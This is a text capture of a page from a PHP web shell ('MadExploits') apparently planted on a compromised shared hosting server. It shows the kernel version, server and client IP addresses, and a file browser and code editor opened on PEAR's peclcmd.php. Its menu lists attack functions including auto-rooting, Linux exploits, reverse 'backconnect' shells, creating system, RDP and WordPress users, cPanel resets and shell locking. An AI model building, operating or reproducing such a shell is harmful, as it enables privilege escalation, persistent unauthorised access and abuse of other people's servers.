Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
php53 /
usr /
share /
pear /
[ HOME SHELL ]
Name
Size
Permission
Action
.channels
[ DIR ]
drwxr-xr-x
.pkgxml
[ DIR ]
drwxr-xr-x
.registry
[ DIR ]
drwxr-xr-x
Archive
[ DIR ]
drwxr-xr-x
Auth
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Mail
[ DIR ]
drwxr-xr-x
Net
[ DIR ]
drwxr-xr-x
OS
[ DIR ]
drwxr-xr-x
PEAR
[ DIR ]
drwxr-xr-x
Structures
[ DIR ]
drwxr-xr-x
Symfony
[ DIR ]
drwxr-xr-x
XML
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
ezc
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.depdb
12.91
KB
-rw-r--r--
.depdblock
0
B
-rw-r--r--
.filemap
383.27
KB
-rw-r--r--
.lock
0
B
-rw-r--r--
Mail.php
9.65
KB
-rw-r--r--
PEAR.php
33.06
KB
-rw-r--r--
PEAR5.php
1.06
KB
-rw-r--r--
System.php
20.34
KB
-rw-r--r--
pearcmd.php
14.2
KB
-rw-r--r--
peclcmd.php
1.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : peclcmd.php
<?php /** * PEAR, the PHP Extension and Application Repository * * Command line interface * * PHP versions 4 and 5 * * @category pear * @package PEAR * @author Stig Bakken <ssb@php.net> * @author Tomas V.V.Cox <cox@idecnet.com> * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @version CVS: $Id$ * @link http://pear.php.net/package/PEAR */ /** * @nodep Gtk */ //the space is needed for windows include paths with trailing backslash // http://pear.php.net/bugs/bug.php?id=19482 if ('/opt/alt/php53///usr/share/pear ' != '@'.'include_path'.'@ ') { ini_set('include_path', trim('/opt/alt/php53///usr/share/pear ')); $raw = false; } else { // this is a raw, uninstalled pear, either a cvs checkout, or php distro $raw = true; } define('PEAR_RUNTYPE', 'pecl'); require_once 'pearcmd.php'; /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: nil * mode: php * End: */ // vim600:syn=php ?>
Close